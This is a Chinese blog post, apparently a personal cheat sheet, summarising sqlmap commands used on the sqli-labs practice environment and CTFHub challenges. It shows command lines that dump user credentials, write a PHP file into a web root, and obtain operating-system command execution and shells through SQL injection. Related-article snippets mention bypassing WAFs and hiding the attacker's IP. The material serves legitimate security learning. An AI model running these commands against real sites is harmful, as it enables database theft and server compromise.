sqlmap常用总结

最新推荐文章于 2024-04-27 12:15:18 发布
最新推荐文章于 2024-04-27 12:15:18 发布
阅读量386 收藏
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JDWDXN/article/details/108885306
版权

sqlmap --help 查看帮助

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0
在这里插入图片描述

sqlmap支持的注入方式

-u 检测url是否有注入点
sqlmap -u “http://192.168.61.149/Less-1/?id=1”
无损测试,并且列出一些测试例子
在这里插入图片描述

-u的测试

–dbs 获取所有的数据库
sqlmap -u “http://192.168.61.149/Less-1/?id=1” --dbs

–current-db 获取当前所使用的数据库
sqlmap -u “http://192.168.61.149/Less-1/?id=1” --current-db

-D 指定所测试的数据库
–tables 获取该数据库中所有的表格
sqlmap -u “http://192.168.61.149/Less-1/?id=1” -D “security” --tables

-T 指定所测试的表格名
–columns 获取该表格中所有的字段名
sqlmap -u “http://192.168.61.149/Less-1/?id=1” -D “security” -T “users” --columns

-C 指定所需要的字段名称
–dump 获取特定字段的所有数据
sqlmap -u “http://192.168.61.149/Less-1/?id=1” -D “security” -T “users” -C “username,password” --dump

2.POST方法 的注入
首先使用brupsuite抓post包,把抓取的结果放入一个文件中
sqlmap -r post.txt
后续步骤 同get方法

3.cookie 的注入
–cookie 指定cookie中使用的参数
–level 要使用cookie注入sqlmap要运行在level 2
sqlmap -u “http://192.168.61.149/Less-20/index.php” --cookie “uname=admin” –level 2
运行级别需要level 2
后续步骤 同get方法

4.使用sql来写入文件
–is-dba 测试当前用户是不是数据库管理员
sqlmap -u “http://192.168.61.149/Less-1/?id=1” --is-dba

–file-write= 上传源文件的绝对路径
–file-dest= 上传文件的目标路径
sqlmap -u “http://192.168.61.149/Less-1/?id=1” --file-write=/root/hack.php --file-dest=C:/phpstudy_pro/www/Less-1/hack.php
不过,建议通过hackbar去写入,因为sqlmap写入似乎只能针对简单情况的写入,如sqli-lab中的level1,但是level7就不可以,而hackbar可以。

5.直接运行命令
–os-cmd= 运行操作系统的命令 必须有数据库管理员权限,必须在网站目录下
sqlmap -u “http://192.168.61.149/Less-1/?id=1” --os-cmd=ipconfig
–os-shell 获取操作系统的shell
sqlmap -u “http://192.168.61.149/Less-1/?id=1” --os-shell

以上均要求在网站目录下,且同样只适用于简单的注入测试【即只含单引号那种】
在这里插入图片描述

要求在网站目录下

–time-sec(秒):当使用时间盲注时,时刻使用–time-sec参数设定延时时间,默认是5秒。

–union-cols:默认情况下sqlmap测试UNION查询注入会测试1-10个字段数,当–level为5的时候他会增加测试到50个字段数。设定–union-cols的值应该是一段整数,如:12-16,是测试12-16个字段数。
设定UNION查询使用的字符

常用
sqlmap -u “http://challenge-58b73584252db2d5.sandbox.ctfhub.com:10080/?id=1” --threads=10 --dbms=mysql --batch --technique U -D sqli --tables

sqlmap -u “http://challenge-1ffe374f49059ed4.sandbox.ctfhub.com:10080/” --data --threads=10 --batch -p user-agent --technique U --user-agent=-2 -D sqli -T wzxjypujxc --dump
【这是对于http头部注入常用的,因为http头部注入需要指定post方式,所以这里如果-u,则加上–data就相当于以post方式请求,-p则指定请求位置{user-agent、referer、cookie、host等},不可以就尝试加上–level、–risk;
还有,user-agent的注入有点特殊,建议指定–user-agent=-2类似的形式,然后再尝试注入,其实http头部的注入都建议这样{否则可能是再原语句后面添加slq语句实现注入,但有时候会出错,user-agent就曾经试过,但指定后就没问题了}】

注意
-r **txt的方式一定要为post,否则会出错,所以需要将get请求改为post请求,才可以正常注入

sqlmap常用总结1

本博客由自己实验,并参考部分博文写成。如有作者觉得侵权,请联系本人删除。

JDWDXN
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
总结一些SqlMap常用tamper脚本释义.docx
02-02
SqlMap常用 Tamper 脚本释义 SqlMap 是一个功能强大且广泛使用的 SQL 注入检测工具,它提供了多种 tamper 脚本来帮助用户绕过 Web 应用防火墙(WAF)和入侵检测系统(IDS),从而实现对网站漏洞的检测和利用。...
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
Sqlmap工具使用笔记
weixin_51339377的博客
04-07 4674
pip install sqlmap SQLmap建议使用kali版本的 不建议使用windows版本 攻击的时候建议使用vps去攻击 否则本地ip会很快被封 sqlmap sqlmap -u "目标网址" --dbs sqlmap -u "目标网址" -D [数据库名] --tables sqlmap -u "目标网址" -D [数据库名] -T [表名] --columns sqlmap -u "目标网址" -D [数据库名] -T [表名] -C [列名] --dump...
史上最详细sqlmap入门教程_sqlmap使用教程(1)
最新发布
2401_84253037的博客
04-27 944
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4137
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
SQLmap工具使用教程
weixin_62528361的博客
09-14 1404
sql注入入门教程
超详细SQLMap使用攻略及技巧分享
白昼小丑的博客
03-28 912
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
SQLmap使用总结
Alexz__的博客
02-15 3604
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
sqlmap.rar
08-02
总结起来,Sqlmap是网络安全专业人士手中的重要工具,它能够帮助我们有效地发现和利用SQL注入漏洞,提升我们的安全评估能力。理解Sqlmap的工作原理和使用技巧,不仅有助于我们保护自己的网站免受攻击,也有助于我们...
sqlmap-master.zip
01-19
总结SQLMap是一个强大的数据库安全测试工具,利用Python环境运行,能有效地帮助安全专家和渗透测试人员发现并利用SQL注入漏洞。正确理解和使用SQLMap,不仅有助于提升网络安全意识,还能确保网络应用的安全性。
iBatis学习总结
03-06
1. **配置文件**:iBatis的配置文件包含了数据库连接信息、SqlMapConfig.xml,以及具体的SQL映射文件SqlMap.xml。这些文件定义了数据源、事务管理器和SQL映射文件的位置。 2. **SQL映射文件**:SQL映射文件是iBatis...
ibatis开发包(common+sqlmap+dao)
08-09
Ibatis,全称为MyBatis...总结来说,这个Ibatis开发包为Java开发者提供了一套高效、灵活的数据库操作工具,能够极大地提高开发效率和代码质量。无论是对于新手还是有经验的开发者,理解和掌握Ibatis都是非常有价值的。
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7178
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
​SQL注入非常详细总结
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
sqlmap注入总结
weixin_34321753的博客
08-22 1435
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
Sqlmap命令大全
热门推荐
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
Sqlmap讲解
山兔的博客
08-01 1070
SQL注入测试方法: 1.手工测试 优点:测试方法灵活 缺点:效率低、范围窄、因测试者技术水平而异 2.工具测试 优点:自动化、效率高、范围广 缺点:误报、漏报、测试方法有限 SQLMAP简介 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测、利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令 官方地址:https://sqlmap.org/
sqlmap常用命令
12-07
以下是sqlmap的几个常用命令: 1. 基本扫描命令:`python sqlmap.py -u <目标URL> --dbs`,用于扫描目标URL的数据库。 2. 指定cookie进行扫描:`python sqlmap.py -u <目标URL> --cookie="内容>" --dbs`,用于使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值